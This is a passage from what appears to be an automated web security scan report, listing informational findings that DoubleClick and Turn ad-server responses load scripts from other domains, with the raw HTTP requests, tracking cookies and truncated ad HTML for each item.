Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=22fba3001601008d||t=1303072660|et=730|cs=-8oc1u1u; __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Sun, 24 Apr 2011 15:21:41 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 5736

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Template Id = 13,901 Template Name = Banner Creative (Flash) - In Page
...[SNIP]...
<!-- Copyright 2006 DoubleClick Inc., All rights reserved. --><script src="http://s0.2mdn.net/879366/flashwrite_1_2.js"></script>
...[SNIP]...
<!-- start DV tag-->
<script type='text/javascript' language='javascript' src='http://cdn.doubleverify.com/script26.js?agnc=422775&cmp=4970757&crt=&crtname=&adnet=&dvtagver=3.3.1346.2176&adsrv=1&plc=57848023&advid=2179194&sid=973580&adid='></script>
...[SNIP]...

24.24. http://ad.doubleclick.net/adi/N553.158901.DATAXU/B5114832.6  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N553.158901.DATAXU/B5114832.6

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /adi/N553.158901.DATAXU/B5114832.6;sz=728x90;pc=[TPAS_ID];ord=NERCNDNGQTAwMDA4NzgwQjBBRTU3RTg4MzBCMTREOEJ8R0Z4SVo3ZkJBZHwxMzAzNjU4NDAyNTg0fDF8MEYzTllTc2l3d3wwUmtQUXJRUkZ5fEVYXzEwMjM0NzcyMDZ8MTM4OTYy? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://cdn.w55c.net/i/0RkPQrQRFy_1341446950.html?rtbhost=rts-rr11.sldc.dataxu.net&btid=NERCNDNGQTAwMDA4NzgwQjBBRTU3RTg4MzBCMTREOEJ8R0Z4SVo3ZkJBZHwxMzAzNjU4NDAyNTg0fDF8MEYzTllTc2l3d3wwUmtQUXJRUkZ5fEVYXzEwMjM0NzcyMDZ8MTM4OTYy&ei=GOOGLE_CONTENTNETWORK&wp_exchange=TbQ_oAAIeAsK5X6IMLFNiw5YQb_V37aYux-2HA&euid=Q0FFU0VPOGx5aWVNVWhXMXZzQlNlZE1IdGRn&slotid=MQ&fiu=MEYzTllTc2l3dw&ciu=MFJrUFFyUVJGeQ&reqid=NERCNDNGQTAwMDA4NzgwQjBBRTU3RTg4MzBCMTREOEI&ccw=SUFCMSMwLjB8SUFCOCMwLjB8SUFCMTQjMC4wOTA5NjI0OXxJQUIyMiMwLjMwMTAwNjA4&bp=138&zc=NzUyMDc&v=0&s=http%3A%2F%2Fpub.retailer-amazon.net%2Fbanner_728_90_b.php&
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=22fba3001601008d||t=1303072660|et=730|cs=-8oc1u1u; __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 2522
Cache-Control: no-cache
Pragma: no-cache
Date: Sun, 24 Apr 2011 15:20:02 GMT
Expires: Sun, 24 Apr 2011 15:20:02 GMT
Discarded: true

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Template Id = 4,228 Template Name = HTML Image Banner + Optional Additio
...[SNIP]...
</script>


<script type='text/javascript' language='javascript' src='http://cdn.doubleverify.com/script26.js?agnc=422775&cmp=5114832&crt=&crtname=&adnet=&dvtagver=3.3.1346.2176&adsrv=1&plc=62154145&advid=1297440&sid=973580&adid='></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...

24.25. http://ad.doubleclick.net/adi/N5762.158901.DATAXU/B4799014.12  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N5762.158901.DATAXU/B4799014.12

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /adi/N5762.158901.DATAXU/B4799014.12;sz=160x600;ord=NERCNDUwOEMwMDBENkZGQzBBRUM2NjEzQkFGRjcwRUV8R0ZIMlV3cUxBSnwxMzAzNjYyNzM0OTIyfDF8MEZZWG9GdFhPUXwwUlppZUREZUdJfDlRUXhjVE81dUgySWE3Qms0dkdTMlM5NnVmT0dzU0RDfDIwNTc3MQ? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://cdn.w55c.net/i/0RZieDDeGI_308736425.html?rtbhost=rts-rr14.sldc.dataxu.net&btid=NERCNDUwOEMwMDBENkZGQzBBRUM2NjEzQkFGRjcwRUV8R0ZIMlV3cUxBSnwxMzAzNjYyNzM0OTIyfDF8MEZZWG9GdFhPUXwwUlppZUREZUdJfDlRUXhjVE81dUgySWE3Qms0dkdTMlM5NnVmT0dzU0RDfDIwNTc3MQ&ei=GOOGLE_CONTENTNETWORK&wp_exchange=TbRQjAANb_wK7GYTuv9w7qr-ELGqjb86HRtR-A&euid=Q0FFU0VPOGx5aWVNVWhXMXZzQlNlZE1IdGRn&slotid=MQ&fiu=MEZZWG9GdFhPUQ&ciu=MFJaaWVERGVHSQ&reqid=NERCNDUwOEMwMDBENkZGQzBBRUM2NjEzQkFGRjcwRUU&ccw=SUFCMSMwLjB8SUFCOCMwLjB8SUFCMTQjMC4wOTA5NjI0OXxJQUIyMiMwLjMwMTAwNjA4&bp=205&zc=NzUyMDc&v=2&s=http%3A%2F%2Fpub.retailer-amazon.net%2Fbanner_120_600_b.php&
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=22fba3001601008d||t=1303072660|et=730|cs=-8oc1u1u; __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 5325
Cache-Control: no-cache
Pragma: no-cache
Date: Sun, 24 Apr 2011 16:32:14 GMT
Expires: Sun, 24 Apr 2011 16:32:14 GMT
Discarded: true

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve
...[SNIP]...
<!-- Code auto-generated on Wed Sep 08 10:39:48 EDT 2010 -->
<script src="http://s0.2mdn.net/879366/flashwrite_1_2.js"></script>
...[SNIP]...

24.26. http://ad.doubleclick.net/adi/pcw.main.news/topics/consumer_advice/article  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/pcw.main.news/topics/consumer_advice/article

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /adi/pcw.main.news/topics/consumer_advice/article;pg=article;aid=149142;c=2206;c=1746;c=2210;pos=728leader;tile=1;sz=728x90;ord=02880823?;c=win7 HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.pcworld.com/article/149142/identity_theft_monitoring_services_called_waste.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=22fba3001601008d||t=1303072660|et=730|cs=-8oc1u1u; __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Sun, 24 Apr 2011 19:48:30 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6181

<html><head><title>Click here to find out more!</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All
...[SNIP]...
<!-- Code auto-generated on Fri Apr 15 14:40:07 EDT 2011 -->
<script src="http://s0.2mdn.net/879366/flashwrite_1_2.js"></script>
...[SNIP]...

24.27. http://ad.doubleclick.net/adi/pcw.main.news/topics/consumer_advice/article  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/pcw.main.news/topics/consumer_advice/article

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /adi/pcw.main.news/topics/consumer_advice/article;pg=article;aid=149142;c=2206;c=1746;c=2210;pos=336showcase;tile=2;sz=336x280;ord=02880823?;c=win7 HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.pcworld.com/article/149142/identity_theft_monitoring_services_called_waste.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=22fba3001601008d||t=1303072660|et=730|cs=-8oc1u1u; __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Sun, 24 Apr 2011 19:44:30 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 632

<html><head><title>Click here to find out more!</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><script type="text/javascript" language="javascript">
var fd_c
...[SNIP]...
</script>
<script type="text/javascript" language="javascript" src="http://adsfac.us/ag.asp?cc=DLK001.311878.0&source=js&ord=[timestamp]"></script>
...[SNIP]...

24.28. http://ad.doubleclick.net/adi/pcw.main.news/topics/consumer_advice/article  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/pcw.main.news/topics/consumer_advice/article

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /adi/pcw.main.news/topics/consumer_advice/article;pg=article;aid=149142;c=2206;c=1746;c=2210;pos=2-336showcase;tile=9;sz=336x280;ord=02880823?;c=win7 HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.pcworld.com/article/149142/identity_theft_monitoring_services_called_waste.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=22fba3001601008d||t=1303072660|et=730|cs=-8oc1u1u; __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Sun, 24 Apr 2011 19:44:30 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 1009

<html><head><title>Click here to find out more!</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><script src="http://bs.serving-sys.com/BurstingPipe/adServer.bs?cn=rsb&c=28&pli=2419013&PluID=0&w=300&h=250&ord=4783842&ifrm=1&ucm=true&ifl=$$http://www.pcworld.com/eyeblaster/addineyeV2.html$$&ncu=$$http://ad.doubleclick.net/click%3Bh%3Dv8/3af3/3/0/%2a/s%3B237554731%3B0-0%3B0%3B28183772%3B4252-336/280%3B41666872/41684659/1%3B%3B%7Eaopt%3D2/1/64/0%3B%7Esscs%3D%3f$$"></script>
...[SNIP]...

24.29. http://ad.turn.com/server/ads.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.turn.com
Path:   /server/ads.js

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /server/ads.js?pub=5622371&cch=5689307&code=5689677&l=160x600&aid=25622058&ahcid=787926&bimpd=lkIA6MZjgdWNLb-ezcBaeR_R3Ys3RWmwKz7fP1nwguKkWeHPXDae0aU5zRDsg2DaUngWeeLXhaTZYK2uLANKOa9niBJoz6621irB3f190hXQBbsq7GRkM0K-RGUzu2oktl1sL4zS-2XTqCiC_CemeNW-SvPVZ9uvWN6QKCcGWsGWw_XUAnRIc08sAhMi6jaM3UfbSMqNBzxuuOzvFqY6BAVsGcZaad0LohGRrY_PptpgOqkQGoDTJbJd7uwGGvhIlgHBzIj8H9loLjUdnhyPRbB5cdXFU4eUtt0Sd-buMq4iT9bDskPT3GYIORMjuNHSgU2xBm3QHaMdsIoCKhXuXzRgCD-gHnxGWovO3Pj6yB57QZSR55M9KtvER9_PB-eitC8cnfVoc-ffY0bjr9ypPula_qJLrXcrZr4baiYl_ymbdXBugl_YriUkFVc2JIJzcrbHBKfRsOA81Nd1u8is6AaJQmyFM1l4x-S8oOkTR0VUULXw7tpNDsCXeX5kiU7IMmAKf-fTCPDGWd8sW3YPeje31BMcyDn3elA9zU91mj8tpJsct7VH1G9-d_6KUMHbX91mNtx9s8FQapZIbkQ1tLXj2l4eq3bXsLRG2lgk3vGND4gyL4tJYU4x0ZDJlERs5RRYa-cfSyudFlPXwGJCEdWGFeOJW7Ysm02dNTuGUaDt_T370WDWWY1SqEwEJwbhx8Qd9AYEkrt9Ysl-GVyMgJyFabNKBnxQoIOFlgiYOrJA9y0FUzpqtDC0K6uSmpOa-_o7WETpsTIqibm6vBqblKo408BxR9uazB8jKSDnLvk&acp=TbRO2gAMv4cK7GMUxys8ZZyWt7UCxBiTiBOAew&3c=http://googleads.g.doubleclick.net/aclk%3Fsa%3Dl%26ai%3DBND4Z2k60TYf_MpTGsQfl-Ky5DMCshNABlKfb8wyIx7WKGQAQARgBIAA4AVCAx-HEBGDJ7oOI8KPsEoIBF2NhLXB1Yi02ODg4MDY1NjY4MjkyNjM4oAGM97n0A7IBF3B1Yi5yZXRhaWxlci1hbWF6b24ubmV0ugEKMTYweDYwMF9hc8gBCdoBSGh0dHA6Ly9wdWIucmV0YWlsZXItYW1hem9uLm5ldC9iYW5uZXJfMTIwXzYwMF9iLnBocD9zZWFyY2g9JTdCJGtleXdhNmQ0YpgCZMACBMgC7JPpCagDAegDvAHoA5QC9QMAAADEgAaBvY_1rt6P2yo%26num%3D1%26sig%3DAGiWqtwcQdRw2WoZD8G7XUPGVbZ5GL2fdg%26client%3Dca-pub-6888065668292638%26adurl%3D HTTP/1.1
Host: ad.turn.com
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-6888065668292638&output=html&h=600&slotname=2465090616&w=160&lmt=1303680301&ea=0&flash=10.2.154&url=http%3A%2F%2Fpub.retailer-amazon.net%2Fbanner_120_600_b.php%3Fsearch%3D%7B%24keywa6d4b&dt=1303662301770&shv=r20110420&jsv=r20110415&saldr=1&correlator=1303662301772&frm=1&adk=2614322350&ga_vid=1987845434.1303662302&ga_sid=1303662302&ga_hid=1938999785&ga_fc=0&u_tz=-300&u_his=3&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=980&bih=907&ifk=4069653789&eid=33895130&fu=4&ifi=1&dtd=4
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uid=2931142961646634775; adImpCount=7n0jLc6wfhYtN4UC_xZHjDE8GknzFh8Yypyq6cE5VZLAQoMWzzeIRUwqlX4XkpTlxEdzmswgsukEeGYUFx4XIGn96wzml5HD9lJW6BrLMriX4Qp5J-iSAILnbVuT-E5IREBfIGiYWGHD9doGCH1wTar1Ljo6rmrwvUfLD268riQ_eup_DpbPuBi-l0uJC1Cg4iLKE3m6yPkT4AvF4oP9oThAVWEvsmYmt6NIdXLN-7b0mfx30Z0m20DUYOHma1iMewwKNG6Vp-GxfVf_EykU6LfwESJ4HNhmJtjvBex-YKCc8G7vou24z--w_gke0ns7NpEEy1Y6E_EHxRfmbLZ1cWrMkfzJCRjod-12LuM3yNEMg6fMWn5Rve6KLxWq7P0IemNa-3CGw7dg2Xbxl9yyjzN5A4QuG2K_aAO-SHF7T3HhNKKp2uy6Jf_izbJ4fT1IrryLc_cS88mcNh9O05zZai8bW8edLI4EYiBeioa8Nn9qGjdQJTtjVZ9bXK_YQ_BT6XeCQtDvRN0cpJn9N6TdvW1HPNJmxjyYHWoZ-RvqO1TyAJqDG6mEyZwudlJBlLWH_ftWvK6YyvSIbYzcA4q2yx3BGIBe1qfIDTYPebZTLrCK9n04eTj2yLvG-HV9NqT6KR1gXBTdH5jry0PtoQ1AeAN4eSYVpeIfay296bMhgEJxTnotBPRoUrzcJvCV5S7_9t1sffihX5_BegTFe1GGIwYQ2KIH69otvVReKhLMDlxtBPdeqoht9ByqjYbOh33uTTXcCOkVaDDw03VkGm3uOHwv5ZQ5m2mTzLC0Rhxp-gsGmpS1vpTy7CEw_F27aSBKg9k5fXKFuqlzR-8AtKPkx7fwESJ4HNhmJtjvBex-YKDH_58BKZxUkzXkRdgeq0Ix7dQaUAsNKGmGOpY_21OII_mjcC29cWKAFZLsmzdyJY4hmtwtXYBDOzWNMpz25aDBemNa-3CGw7dg2Xbxl9yyjwlA4TuBUvX_Z-aUIXCkrqYwfqRHkdzRktg9x4ASm7mYu_2URTPQwp7prxJqmG7gw6ah56-HOIRgSSdEiojeZMNqGjdQJTtjVZ9bXK_YQ_BT4YvFPHKFvClTetIp5sFmR7qweRFW5C80-4q0k8PchIH--7-v9iqta9cngGoURkxMGcnA7v8jRH4b4sl7n9PZN5e7OhQFxHPJ-RJdl3G607nR8xTSPvK-p126IlPZnORzVdA-aRZXmNDP7lSI2wQSG55QP38_1fR9TckYAsb5pqNucRLlW4qnXZ7CXUVHWv4ip4RnopZye3I2VeDNhcjONP3-03B9JybbDQvPN0b-ukCyYLZMG4wQKFopdYuz1yBk6uornER4wRmSESJpiu82ECcJYAYD6EJQRZIEqwxwbz_lEmZ6JYNjKYtD6G2Zr0AzhTeXLgOjd5mCNMGZRMvzlPAi0-ygCjElB_D6jIRDFHIIScgwH8T5VpAgEj7tO6HQQQ0XtSgyP9-pRtjKBA9Cw7ifk0uxOjACIFVeNuv3Kptjw1q3jr96MmE73EdnErm3EO2R2jzxNQwIDSsUseWLhslLQZMoibX_53_H1iN9tYSj37arSozuBgqeZjp8etrKSH2BCJVCBKtPUgj7zhVaUIKqMVJJLJFDSB1wQojnNFKx04J3oj7OMPjzQdK5UfC2Jq2FR28g6N4ppYAe8Ruw3nqjVEnayD5Ik9CHgcwVvzn1LVARRZp3iAtwxIPfX4lcsDf_Pg2Vk_EWg-3dTD9pFenpFYpar7IAWiFrHeXfQIHuPt4ZMkfGTNUtC_PYTNHvl7s6FAXEc8n5El2XcbrTueV1rSiLZsaR5sVWtdVotFRV0D5pFleY0M_uVIjbBBIbVCiLiBpBUs_aknr5mSZhhuLQXpLB6S1HBINAWF7E-PF0vobXYP71SE5qK-q8G4NqDlZT0T_GBbo0bdYkYrIM6bJgtkwbjBAoWil1i7PXIGQAPq2-xg2GU0iNwzc4oGYf3U9yID4iMwKKBdWV0IWb4UHV201d3HZkauFg6OLUDww3Jco1_R6UO1xvstgmxd5oQQ0XtSgyP9-pRtjKBA9Cw-GbtMuSaHyCQtilVO0TY35jw1q3jr96MmE73EdnErm3sXSWj33G2Id3fM0m0Vv4l0jli_TYoFivdNz7W5XnWhDyphPg-RvEIoKBsFf6hjJvz2j2Qwj8cAVDSdBqW8BsrEqZy6Y983pwwSDKSbe2RC_kQoqJU_QjMpvwA6B8XQ75PSe6v1RpmK4AsjvGkw2msw7A-ILjAFqpx2M97C_Qtz6J-BEk0gCmyMGiyl2orSTXJgj3PYUSQksso83I27-VpIdXcEj3ATIHZ85bzjN59N1DesUH20WtmvEB85BGPQpVkX1adMEtSrGVs2U2coDfuajCpNlzAU3BFA2FUt1sY_z7JOCOD7od2p9Te_znzPLbFA49dyv4IOKemp9vkrTaHkid5u8voWars0ao_qpATqMTOTrNaZNANkBQjTexPCSafTSgpU4WHI3o7mz1yzeVtYE8N214FgBQDqQ4AvNfADBxNFi6SzWBu_A0Bbz1DMFVPSwfzkEF_z-gmdBqR5XUS_M3WvwMyoFdwzhFXPWWQAksB_srXEX4XpRKl9JBbxfxCG0ws7RKdslrrWG9FSHPfhOol8x7GcPW7kOnjSxzWjOywl4MuvfIipJ5uQ86jruUqv-BIgls5GMzhMPeQwyEEFAsLCSkxSCrw_Ka5doSqf2n0-lzpZDW3GxkM5Vc5hSjx5E4ajxLy24vZakjmlK7hBJK_lYL5YT6meUEDXaDLlth6GMsF-ZOXLRkCIiZdG4M_0HrCDKWrOFAi-3C0FAmBHnxfGYbg8COr02CVA34ezeHr4kD4IlHa-MMtxzuRfpv6ZVy5tUFP8vHhPZZkAmMM57eIbw_tY4C8HwmvvlhVGv8f4oOlu-Y0H6CqCbpQlF3v4slE2NCoocDEbMh7cDYOl_pU1S1DLzGiyxwGcuqgclX7IX5kFw94Ao9YPRny-RliH0i_LnkGLCdmk4MHDY7cSGOzokR-Oj8vP_2TSIYVN-8eQQ9O4KBYCVz0qItajtxmAshwxhbdMwe6MleT6PyVNqDXQwOLOIY2xu6P46AVksb7XdGynWyfHWytc_1lQPjrr750zRIZosJx9vG-GX2NHM7sKXJ37jo8-Jo4l8ddCZ0vbPY7NuPCkRfUJhuE9AG4r1_YBTH-5c5XvIOWMQKl-cdIC2fZhQepvvG5ZZZnAWHUIL1Guk7LM91kn-aJkpfOMQrt0lXDDGNIVD1SIh95bnm5A1FODwtLmHFCk4l3u4YUf8ReOuAPhbr9Nk34bCLmfH7Nl8tw2WqHUUkZ98JnJB6oWA0COW-xJeoEq79QtrOIBhaDR4tImYyfQddC6mxEIQGL9aux0Wy38Bq74ivwwUQ60dTkdFij10MJiUa9kl48TEunCtFLndtCy8eree7J9IekinTGw43yVJN00xxmSO3Zgc6iCsG01x0Dd27QFsrbn5uOBEJpIq5XcXboltYJTZc5dzQZbKS7KFurg7MY4t3auAill3FqTv4t7sCFOwxvjx_ZcdII-FGoXPlGQ-BM8eHGmxiK1X6esaML5Acc_Llvj5X9yLN7-Yc2YS4k_EO88xj88xPI03nF5WXwZ25; fc=sVaQWGK_c_yr5nji4YJUfcbLxG6Rjky-ZVHROMXM-1E4OhgZIpdKD2vECvnz_VEM2CjyBHHN4B50paqel1-StJLdzlSJYnWgjgpSWPKJZqanh77CDv_Cb5k2sLKUWKhYlRW_MKDTtf-sBpmbpaidAFDzQrUnrBcELT8jzJBt9GgVxzGoC7kGLIbIhejl5eSL117dg5whaFGMwxNuo3bM3cdBF4hyWWGJ3xpNV_dvAQw_F9c8z5-xQ96PvJcb-tlK; pf=VrozooDcByghq55gga6oN_Blt_n-BRpYF3beF1itT8sIHKIn0aMUCJnjty0nF6sdgjbg707c8UN19xROYfxBRNS2adKbTT6osPmdQ8QvGT_B8rw3HCsM6f9IpOSiQTFvJRKRbaQOui20s_9Bg4OdTngvxbAnhJ28PXFGVB1HyKBzy9fyoK7Wm9GhDtN3JSpoDSdgzvPz5efu6QjaGKhI5UwRUPHDfEOV3_7TnliI6U0x0lAZcaUvKKJ1QHmD_0YTw3USs_Efch8DyLQMqjj6C38-1lKIfX8YIpHRO4p--bGdMJBPDfs0jkNOV4KIC2xDdyNCEwJ23wuLt_MXDO1Z_IPhKl9BwPkNTah2lgQhjENI6H6e7r5GTuDHDKVwuDsSEg7X7QYS6UmUwbg2ikGtI0G3AaAZcVYD2Nt2uXf8ZtPeW6pgENIG8_w3xeZd6kK1sMs6I0SNDLzqnN7H1gbxbZdD0DY_lKb855iyP7fClP5XxONep4hNPzsxAJRJ1kou-ViOtsrp_bf27P9c5lUTyCQKcdzHjBck_b_B-UHMhYH6KLrjh5PX3m_XxZw53g56CxLowAXMELECGkbRM_oCpxhBhsTZW3iX4HdrzgpwAaQUck2p3bpVoUvhSSLXPCI9YtE-kyi_nTaX0IVqR-yakQI0mYYAhFFECfCHCg2SRYxq0S6M5I00QXLWYk2q3FJRFAkPpRwM27uiAj3Z4Fb61SVxTnK9m8UT7c0aPfZXb45oPleeGy8UXPpw6YYtnkYd_D_l2IAslLLyavszHjZBPa2iUWFiyom5hkFnxOuMWDkxYJXvwfLfmqZkXT0JHDrVc4TY00edyWQMXDx77_42FDNx_pd_cAxTF40mk5v5pYwWwImtJiseNAMcdxLAMVqLXSN0ML_WxcCtQ1Ci02yJaWGlL3V4Ng9ZefLRufU4NIErvMs-foQv1s-THrPJvkSFf_RbvZfjFZEbm5rhYFYobJEeNFTJ5qhmGU_V9TSYPraYX96uGtM_3pFVOdw-9XnKnQJPf1j2ATP8fxtG9wtsxg; rrs=1%7C2%7C3%7C4%7Cundefined%7C6%7C7%7Cundefined%7C9%7C1001%7C1002%7C1003%7C10%7C1004%7Cundefined%7C12; rds=15082%7C15082%7C15082%7C15088%7Cundefined%7C15082%7C15082%7Cundefined%7C15082%7C15082%7C15085%7C15085%7C15082%7C15085%7Cundefined%7C15085; rv=1

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
P3P: policyref="/w3c/p3p.xml", CP="NOI CURa DEVa TAIa PSAa PSDa IVAa IVDa OUR IND UNI NAV"
Cache-Control: public
Cache-Control: max-age=172800
Cache-Control: must-revalidate
Expires: Tue, 26 Apr 2011 16:25:00 GMT
Set-Cookie: uid=2931142961646634775; Domain=.turn.com; Expires=Fri, 21-Oct-2011 16:25:00 GMT; Path=/
Set-Cookie: bp=""; Domain=.turn.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: bd=""; Domain=.turn.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: adImpCount=HHrIK5hAlUnQBoCN0bSvefMc2aF_d4O6NbvYHyiG4jrAQoMWzzeIRUwqlX4XkpTlxEdzmswgsukEeGYUFx4XIGn96wzml5HD9lJW6BrLMriX4Qp5J-iSAILnbVuT-E5IREBfIGiYWGHD9doGCH1wTar1Ljo6rmrwvUfLD268riQ_eup_DpbPuBi-l0uJC1Cg4iLKE3m6yPkT4AvF4oP9oThAVWEvsmYmt6NIdXLN-7aaNTkI9kS54NknjDupuixK5USU-ZcOXIQo4iBgywgxw7fwESJ4HNhmJtjvBex-YKBtMoOjMfgnqSKBm8uRROyp_0wuBEv5K59-FgY_KS69_toCOQisz4wYu1aRlLO_q9dObNhCfGM-ksQnUh4TxpdHemNa-3CGw7dg2Xbxl9yyj6AYjXhTSIw6z6qbZ6xheAvhNKKp2uy6Jf_izbJ4fT1IEPHO3_r72yVU4GQkE5oTqqXa0db9PEB0kZFgOkbWCiJqGjdQJTtjVZ9bXK_YQ_BTgtVJj4_1ydNStOQnPPrnrG1HPNJmxjyYHWoZ-RvqO1RjP6j5yoDetv1dHSPkIYgPFTUpFr2Sd9cwp1pS459Skh3BGIBe1qfIDTYPebZTLrDOC-VCmCQbUZMtawqCLvvmKR1gXBTdH5jry0PtoQ1AeM37Bfigr7HDTxZoxZiwsWfX15VcAFldmraeNOcTMkrum9YpuWKbAR0rzdoecy5gZy3WXyJHyyuomO7DjHx9DERtBPdeqoht9ByqjYbOh33u-1d3YQe7N-3IAQesJf2UHCk5ZCkZva7scR7OAbaax21Ec8OVkmsGiB-c6iWVn9ld27GAKZi-oEp2bDk9Utrxk7fwESJ4HNhmJtjvBex-YKDJQD84niFp1gCpoN54_iTS7dQaUAsNKGmGOpY_21OIIyOjD7OO6-cARpkZSLPRSVlzaD4aw7phrXQ8Sa65QbHAemNa-3CGw7dg2Xbxl9yyjzPaDe3o_bL1Qxs5JcgZIBEwfqRHkdzRktg9x4ASm7mYEUY0gkSIQpBXzynTrJNwCSFM3wJ2ug19vueYnHYtN1xe2P_hhg7Zbh0pY2S6uagWAKvNWR9DVB7s857bYqH-vZR6D3V1MZpXDmdmkMw9H28y3_SMVKIz-IywSNv3WzvIF-t4yaRUKwYipw0CJzB0aIjgoipP0yyjzR5ioI9loz99U1RtOkWEInQ5e--zZMdSVdA-aRZXmNDP7lSI2wQSGyeUFM0FnJRRrPY